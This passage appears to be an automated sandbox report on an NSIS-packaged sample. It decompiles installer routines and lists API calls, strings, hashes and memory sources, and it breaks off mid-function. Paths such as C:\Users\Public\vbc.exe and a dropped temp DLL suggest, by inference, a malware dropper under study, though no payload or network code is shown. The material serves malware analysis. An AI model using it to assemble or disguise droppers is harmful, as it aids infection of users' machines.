              				if(__eflags != 0) {
              					_t50 = E00402A29();
              					_t28 = E00402A29();
              					asm("sbb ecx, ecx");
              					asm("sbb eax, eax");
              					_t31 =  ~( *_t27) & _t50;
              					__eflags = _t31;
              					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
              					goto L10;
              				} else {
              					_t52 = E00402A0C();
              					_t37 = E00402A0C();
              					_t48 =  *(_t55 - 0x14) >> 2;
              					if(__eflags == 0) {
              						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
              						L10:
              						 *(_t55 - 0xc) = _t32;
              					} else {
              						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
              						asm("sbb eax, eax");
              						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
              					}
              				}
              				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
              				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
              					_push( *(_t55 - 0xc));
              					E00405B25();
              				}
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
              				return 0;
              			}













              APIs
              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
              • SendMessageA.USER32 ref: 00401C42
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004056BA(CHAR* _a4) {
              				CHAR* _t7;
              
              				_t7 = _a4;
              				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
              					lstrcatA(_t7, 0x409010);
              				}
              				return _t7;
              			}





              APIs
              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
              • CharPrevA.USER32(?,00000000), ref: 004056C9
              • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CharPrevlstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 2659869361-4017390910
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E00401D38() {
              				void* __esi;
              				int _t6;
              				signed char _t11;
              				struct HFONT__* _t14;
              				void* _t18;
              				void* _t24;
              				void* _t26;
              				void* _t28;
              
              				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
              				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
              				 *0x40b054 = E00402A0C(3);
              				_t11 =  *((intOrPtr*)(_t28 - 0x18));
              				 *0x40b05b = 1;
              				 *0x40b058 = _t11 & 0x00000001;
              				 *0x40b059 = _t11 & 0x00000002;
              				 *0x40b05a = _t11 & 0x00000004;
              				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
              				_t14 = CreateFontIndirectA(0x40b044);
              				_push(_t14);
              				_push(_t26);
              				E00405B25();
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
              				return 0;
              			}












              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CapsCreateDeviceFontIndirect
              • String ID:
              • API String ID: 3272661963-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00402BF1(intOrPtr _a4) {
              				long _t2;
              				struct HWND__* _t3;
              				struct HWND__* _t6;
              
              				if(_a4 == 0) {
              					__eflags =  *0x420c48; // 0x0
              					if(__eflags == 0) {
              						_t2 = GetTickCount();
              						__eflags = _t2 -  *0x42ec2c;
              						if(_t2 >  *0x42ec2c) {
              							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
              							 *0x420c48 = _t3;
              							return ShowWindow(_t3, 5);
              						}
              						return _t2;
              					} else {
              						return E00405F93(0);
              					}
              				} else {
              					_t6 =  *0x420c48; // 0x0
              					if(_t6 != 0) {
              						_t6 = DestroyWindow(_t6);
              					}
              					 *0x420c48 = 0;
              					return _t6;
              				}
              			}







              APIs
              • DestroyWindow.USER32 ref: 00402C04
              • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
              • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
              • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Window$CountCreateDestroyDialogParamShowTick
              • String ID:
              • API String ID: 2102729457-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
              				long _t22;
              
              				if(_a8 != 0x102) {
              					if(_a8 != 0x200) {
              						_t22 = _a16;
              						L7:
              						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
              							 *0x42a088 = _t22;
              							E00405BC7(0x42a0a0, 0x42f000);
              							E00405B25(0x42f000, _t22);
              							E0040140B(6);
              							E00405BC7(0x42f000, 0x42a0a0);
              						}
              						L11:
              						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
              					}
              					if(IsWindowVisible(_a4) == 0) {
              						L10:
              						_t22 = _a16;
              						goto L11;
              					}
              					_t22 = E00404782(_a4, 1);
              					_a8 = 0x419;
              					goto L7;
              				}
              				if(_a12 != 0x20) {
              					goto L10;
              				}
              				E00403ECF(0x413);
              				return 0;
              			}





              APIs
              • IsWindowVisible.USER32(?), ref: 00404E39
              • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404EA7
                • Part of subcall function 00403ECF: SendMessageA.USER32 ref: 00403EE1
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
              				int _t5;
              				long _t7;
              				struct _OVERLAPPED* _t11;
              				intOrPtr* _t15;
              				void* _t17;
              				int _t21;
              
              				_t15 = __esi;
              				_t11 = __ebx;
              				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
              					_t7 = lstrlenA(E00402A29(0x11));
              				} else {
              					E00402A0C(1);
              					 *0x40a040 = __al;
              				}
              				if( *_t15 == _t11) {
              					L8:
              					 *((intOrPtr*)(_t17 - 4)) = 1;
              				} else {
              					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\Albus\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll", _t7, _t17 + 8, _t11);
              					_t21 = _t5;
              					if(_t21 == 0) {
              						goto L8;
              					}
              				}
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
              				return 0;
              			}










              APIs
              • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll,00000000,?), ref: 0040252E
              Strings
              • C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll, xrefs: 004024FD, 00402522
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: FileWritelstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll
              • API String ID: 427699356-2794715158
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405427(CHAR* _a4) {
              				struct _PROCESS_INFORMATION _v20;
              				int _t7;
              
              				0x42c0a8->cb = 0x44;
              				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
              				if(_t7 != 0) {
              					CloseHandle(_v20.hThread);
              					return _v20.hProcess;
              				}
              				return _t7;
              			}






              APIs
              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
              • CloseHandle.KERNEL32(?), ref: 00405459
              Strings
              • Error launching installer, xrefs: 0040543A
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: Error launching installer
              • API String ID: 3712363035-66219284
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00403585() {
              				void* _t2;
              				void* _t3;
              				void* _t6;
              				void* _t8;
              
              				_t8 =  *0x42905c;
              				_t3 = E0040356A(_t2, 0);
              				if(_t8 != 0) {
              					do {
              						_t6 = _t8;
              						_t8 =  *_t8;
              						FreeLibrary( *(_t6 + 8));
              						_t3 = GlobalFree(_t6);
              					} while (_t8 != 0);
              				}
              				 *0x42905c =  *0x42905c & 0x00000000;
              				return _t3;
              			}








              APIs
              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
              • GlobalFree.KERNEL32(?), ref: 004035A6
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Free$GlobalLibrary
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 1100898210-4017390910
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405701(char* _a4) {
              				char* _t3;
              				char* _t5;
              
              				_t5 = _a4;
              				_t3 =  &(_t5[lstrlenA(_t5)]);
              				while( *_t3 != 0x5c) {
              					_t3 = CharPrevA(_t5, _t3);
              					if(_t3 > _t5) {
              						continue;
              					}
              					break;
              				}
              				 *_t3 =  *_t3 & 0x00000000;
              				return  &(_t3[1]);
              			}

              APIs
              • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402CC1,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405707
              • CharPrevA.USER32(80000000,00000000), ref: 00405715
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CharPrevlstrlen
              • String ID: C:\Users\Public
              • API String ID: 2709904686-2272764151
              • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
              • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
              • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
              • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405813(CHAR* _a4, CHAR* _a8) {
              				int _t10;
              				int _t15;
              				CHAR* _t16;
              
              				_t15 = lstrlenA(_a8);
              				_t16 = _a4;
              				while(lstrlenA(_t16) >= _t15) {
              					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
              					_t10 = lstrcmpiA(_t16, _a8);
              					if(_t10 == 0) {
              						return _t16;
              					}
              					_t16 = CharNextA(_t16);
              				}
              				return 0;
              			}

              APIs
              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
              • CharNextA.USER32(00000000), ref: 00405841
              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
              • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
              • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
              • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              Non-executed Functions

              C-Code - Quality: 78%
              			_entry_() {
              				intOrPtr _t47;
              				char* _t54;
              				CHAR* _t56;
              				void* _t60;
              				intOrPtr _t62;
              				int _t64;
              				char* _t67;
              				char* _t68;
              				int _t69;
              				char* _t71;
              				char* _t74;
              				int _t91;
              				void* _t95;
              				void* _t107;
              				intOrPtr* _t108;
              				char _t111;
              				char* _t117;
              				CHAR* _t118;
              				char* _t119;
              				void* _t121;
              				char* _t123;
              				char* _t126;
              				void* _t128;
              				void* _t129;
              
              				 *(_t129 + 0x20) = 0;
              				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
              				 *(_t129 + 0x1c) = 0;
              				 *(_t129 + 0x18) = 0x20;
              				SetErrorMode(0x8001);
              				if(GetVersion() != 6) {
              					_t108 = E00405F57(0);
              					if(_t108 != 0) {
              						 *_t108(0xc00);
              					}
              				}
              				_t118 = "UXTHEME";
              				goto L4;
              				while(1) {
              					L22:
              					_t111 =  *_t56;
              					_t134 = _t111;
              					if(_t111 == 0) {
              						break;
              					}
              					__eflags = _t111 - 0x20;
              					if(_t111 != 0x20) {
              						L10:
              						__eflags =  *_t56 - 0x22;
              						 *((char*)(_t129 + 0x14)) = 0x20;
              						if( *_t56 == 0x22) {
              							_t56 =  &(_t56[1]);
              							__eflags = _t56;
              							 *((char*)(_t129 + 0x14)) = 0x22;
              						}
              						__eflags =  *_t56 - 0x2f;
              						if( *_t56 != 0x2f) {
              							L20:
              							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
              							__eflags =  *_t56 - 0x22;
              							if(__eflags == 0) {
              								_t56 =  &(_t56[1]);
              								__eflags = _t56;
              							}
              							continue;
              						} else {
              							_t56 =  &(_t56[1]);
              							__eflags =  *_t56 - 0x53;
              							if( *_t56 == 0x53) {
              								__eflags = (_t56[1] | 0x00000020) - 0x20;
              								if((_t56[1] | 0x00000020) == 0x20) {
              									_t14 = _t129 + 0x18;
              									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
              									__eflags =  *_t14;
              								}
              							}
              							__eflags =  *_t56 - 0x4352434e;
              							if( *_t56 == 0x4352434e) {
              								__eflags = (_t56[4] | 0x00000020) - 0x20;
              								if((_t56[4] | 0x00000020) == 0x20) {
              									_t17 = _t129 + 0x18;
              									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
              									__eflags =  *_t17;
              								}
              							}
              							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
              							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
              								 *((intOrPtr*)(_t56 - 2)) = 0;
              								__eflags =  &(_t56[2]);
              								E00405BC7(0x434400,  &(_t56[2]));
              								L25:
              								GetTempPathA(0x400, 0x435400);
              								_t60 = E004030F9(_t134);
              								_t135 = _t60;
              								if(_t60 != 0) {
              									L27:
              									DeleteFileA(0x435000);
              									_t62 = E00402C55(_t136,  *(_t129 + 0x18));
              									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
              									if(_t62 != 0) {
              										L37:
              										E00403540();
              										__imp__OleUninitialize();
              										_t143 =  *((intOrPtr*)(_t129 + 0x10));
              										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
              											__eflags =  *0x42ecb4;
              											if( *0x42ecb4 == 0) {
              												L64:
              												_t64 =  *0x42eccc;
              												__eflags = _t64 - 0xffffffff;
              												if(_t64 != 0xffffffff) {
              													 *(_t129 + 0x1c) = _t64;
              												}
              												ExitProcess( *(_t129 + 0x1c));
              											}
              											_t126 = E00405F57(5);
              											_t119 = E00405F57(6);
              											_t67 = E00405F57(7);
              											__eflags = _t126;
              											_t117 = _t67;
              											if(_t126 != 0) {
              												__eflags = _t119;
              												if(_t119 != 0) {
              													__eflags = _t117;
              													if(_t117 != 0) {
              														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
              														__eflags = _t74;
              														if(_t74 != 0) {
              															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
              															 *(_t129 + 0x3c) = 1;
              															 *(_t129 + 0x48) = 2;
              															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
              														}
              													}
              												}
              											}
              											_t68 = E00405F57(8);
              											__eflags = _t68;
              											if(_t68 == 0) {
              												L62:
              												_t69 = ExitWindowsEx(2, 0x80040002);
              												__eflags = _t69;
              												if(_t69 != 0) {
              													goto L64;
              												}
              												goto L63;
              											} else {
              												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
              												__eflags = _t71;
              												if(_t71 == 0) {
              													L63:
              													E0040140B(9);
              													goto L64;
              												}
              												goto L62;
              											}
              										}
              										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
              										ExitProcess(2);
              									}
              									if( *0x42ec3c == 0) {
              										L36:
              										 *0x42eccc =  *0x42eccc | 0xffffffff;
              										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
              										goto L37;
              									}
              									_t123 = E004056E5(0x434000, 0);
              									while(_t123 >= 0x434000) {
              										__eflags =  *_t123 - 0x3d3f5f20;
              										if(__eflags == 0) {
              											break;
              										}
              										_t123 = _t123 - 1;
              										__eflags = _t123;
              									}
              									_t140 = _t123 - 0x434000;
              									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
              									if(_t123 < 0x434000) {
              										_t121 = E0040540F(_t143);
              										lstrcatA(0x435400, "~nsu");
              										if(_t121 != 0) {
              											lstrcatA(0x435400, "A");
              										}
              										lstrcatA(0x435400, ".tmp");
              										if(lstrcmpiA(0x435400, 0x434c00) != 0) {
              											_push(0x435400);
              											if(_t121 == 0) {
              												E004053F2();
              											} else {
              												E00405375();
              											}
              											SetCurrentDirectoryA(0x435400);
              											if( *0x434400 == 0) {
              												E00405BC7(0x434400, 0x434c00);
              											}
              											E00405BC7(0x42f000,  *(_t129 + 0x20));
              											 *0x42f400 = 0x41;
              											_t128 = 0x1a;
              											do {
              												E00405BE9(0, 0x435400, 0x428c58, 0x428c58,  *((intOrPtr*)( *0x42ec30 + 0x120)));
              												DeleteFileA(0x428c58);
              												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
              													_t91 = CopyFileA(0x435c00, 0x428c58, 1);
              													_t149 = _t91;
              													if(_t91 != 0) {
              														_push(0);
              														_push(0x428c58);
              														E00405915(_t149);
              														E00405BE9(0, 0x435400, 0x428c58, 0x428c58,  *((intOrPtr*)( *0x42ec30 + 0x124)));
              														_t95 = E00405427(0x428c58);
              														if(_t95 != 0) {
              															CloseHandle(_t95);
              															 *((intOrPtr*)(_t129 + 0x10)) = 0;
              														}
              													}
              												}
              												 *0x42f400 =  *0x42f400 + 1;
              												_t128 = _t128 - 1;
              												_t151 = _t128;
              											} while (_t128 != 0);
              											_push(0);
              											_push(0x435400);
              											E00405915(_t151);
              										}
              										goto L37;
              									}
              									 *_t123 = 0;
              									_t124 =  &(_t123[4]);
              									if(E0040579B(_t140,  &(_t123[4])) == 0) {
              										goto L37;
              									}
              									E00405BC7(0x434400, _t124);
              									E00405BC7(0x434800, _t124);
              									 *((intOrPtr*)(_t129 + 0x10)) = 0;
              									goto L36;
              								}
              								GetWindowsDirectoryA(0x435400, 0x3fb);
              								lstrcatA(0x435400, "\\Temp");
              								_t107 = E004030F9(_t135);
              								_t136 = _t107;
              								if(_t107 == 0) {
              									goto L37;
              								}
              								goto L27;
              							} else {
              								goto L20;
              							}
              						}
              					} else {
              						goto L9;
              					}
              					do {
              						L9:
              						_t56 =  &(_t56[1]);
              						__eflags =  *_t56 - 0x20;
              					} while ( *_t56 == 0x20);
              					goto L10;
              				}
              				goto L25;
              				L4:
              				E00405EE9(_t118);
              				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
              				if( *_t118 != 0) {
              					goto L4;
              				} else {
              					E00405F57(0xd);
              					_t47 = E00405F57(0xb);
              					 *0x42ec24 = _t47;
              					__imp__#17();
              					__imp__OleInitialize(0);
              					 *0x42ecd8 = _t47;
              					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0);
              					E00405BC7(0x42e420, "NSIS Error");
              					E00405BC7(0x434000, GetCommandLineA());
              					 *0x42ec20 = GetModuleHandleA(0);
              					_t54 = 0x434000;
              					if( *0x434000 == 0x22) {
              						 *((char*)(_t129 + 0x14)) = 0x22;
              						_t54 = 0x434001;
              					}
              					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
              					 *(_t129 + 0x20) = _t56;
              					goto L22;
              				}
              			}

              APIs
              • SetErrorMode.KERNEL32 ref: 00403150
              • GetVersion.KERNEL32 ref: 00403156
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
              • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
              • OleInitialize.OLE32(00000000), ref: 004031A7
              • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
              • GetCommandLineA.KERNEL32(0042E420,NSIS Error), ref: 004031D8
              • GetModuleHandleA.KERNEL32(00000000,00434000,00000000), ref: 004031EB
              • CharNextA.USER32(00000000), ref: 00403216
              • GetTempPathA.KERNEL32(00000400,00435400), ref: 004032AD
              • GetWindowsDirectoryA.KERNEL32(00435400,000003FB), ref: 004032C2
              • lstrcatA.KERNEL32(00435400,\Temp), ref: 004032CE
              • DeleteFileA.KERNEL32(00435000), ref: 004032E5
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • OleUninitialize.OLE32 ref: 00403366
              • ExitProcess.KERNEL32 ref: 00403386
              • lstrcatA.KERNEL32(00435400,~nsu,00434000,00000000,00000020), ref: 00403399
              • lstrcatA.KERNEL32(00435400,00409148,00435400,~nsu,00434000,00000000,00000020), ref: 004033A8
              • lstrcatA.KERNEL32(00435400,.tmp,00435400,~nsu,00434000,00000000,00000020), ref: 004033B3
              • lstrcmpiA.KERNEL32(00435400,00434C00,00435400,.tmp,00435400,~nsu,00434000,00000000,00000020), ref: 004033BF
              • SetCurrentDirectoryA.KERNEL32(00435400,00435400), ref: 004033DB
              • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
              • CopyFileA.KERNEL32 ref: 00403439
              • CloseHandle.KERNEL32(00000000), ref: 00403466
              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
              • ExitProcess.KERNEL32 ref: 0040353A
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
              • String ID: $ /D=$ _?=$"$.tmp$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$~nsu
              • API String ID: 3469842172-3839672597
              • Opcode ID: 9448f30a402cd05d4ed19a4029ce3e8ae183e0eaa977f2d261942117e08e1749
              • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
              • Opcode Fuzzy Hash: 9448f30a402cd05d4ed19a4029ce3e8ae183e0eaa977f2d261942117e08e1749
              • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 97%
              			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
              				struct HWND__* _v8;
              				struct HWND__* _v12;
              				signed int _v16;
              				intOrPtr _v20;
              				void* _v24;
              				long _v28;
              				int _v32;
              				signed int _v40;
              				int _v44;
              				signed int* _v56;
              				intOrPtr _v60;
              				signed int _v64;
              				long _v68;
              				void* _v72;
              				intOrPtr _v76;
              				intOrPtr _v80;
              				void* _v84;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				struct HWND__* _t182;
              				int _t196;
              				long _t202;
              				signed int _t206;
              				signed int _t217;
              				void* _t220;
              				void* _t221;
              				int _t227;
              				signed int _t232;
              				signed int _t233;
              				signed int _t240;
              				struct HBITMAP__* _t250;
              				void* _t252;
              				char* _t268;
              				signed char _t269;
              				long _t274;
              				int _t280;
              				signed int* _t281;
              				int _t282;
              				long _t283;
              				int _t285;
              				long _t286;
              				signed int _t287;
              				long _t288;
              				signed int _t291;
              				signed int _t298;
              				signed int _t300;
              				signed int _t302;
              				int* _t310;
              				void* _t311;
              				int _t315;
              				int _t316;
              				int _t317;
              				signed int _t318;
              				void* _t320;
              
              				_v12 = GetDlgItem(_a4, 0x3f9);
              				_t182 = GetDlgItem(_a4, 0x408);
              				_t280 =  *0x42ec48;
              				_t320 = SendMessageA;
              				_v8 = _t182;
              				_t315 = 0;
              				_v32 = _t280;
              				_v20 =  *0x42ec30 + 0x94;
              				if(_a8 != 0x110) {
              					L23:
              					if(_a8 != 0x405) {
              						_t289 = _a16;
              					} else {
              						_a12 = _t315;
              						_t289 = 1;
              						_a8 = 0x40f;
              						_a16 = 1;
              					}
              					if(_a8 == 0x4e || _a8 == 0x413) {
              						_v16 = _t289;
              						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
              							if(( *0x42ec39 & 0x00000002) != 0) {
              								L41:
              								if(_v16 != _t315) {
              									_t232 = _v16;
              									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
              										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
              									}
              									_t233 = _v16;
              									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
              										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
              											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
              										} else {
              											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
              										}
              									}
              								}
              								goto L48;
              							}
              							if(_a8 == 0x413) {
              								L33:
              								_t289 = 0 | _a8 != 0x00000413;
              								_t240 = E00404782(_v8, _a8 != 0x413);
              								if(_t240 >= _t315) {
              									_t93 = _t280 + 8; // 0x8
              									_t310 = _t240 * 0x418 + _t93;
              									_t289 =  *_t310;
              									if((_t289 & 0x00000010) == 0) {
              										if((_t289 & 0x00000040) == 0) {
              											_t298 = _t289 ^ 0x00000001;
              										} else {
              											_t300 = _t289 ^ 0x00000080;
              											if(_t300 >= 0) {
              												_t298 = _t300 & 0xfffffffe;
              											} else {
              												_t298 = _t300 | 0x00000001;
              											}
              										}
              										 *_t310 = _t298;
              										E0040117D(_t240);
              										_t289 = 1;
              										_a8 = 0x40f;
              										_a12 = 1;
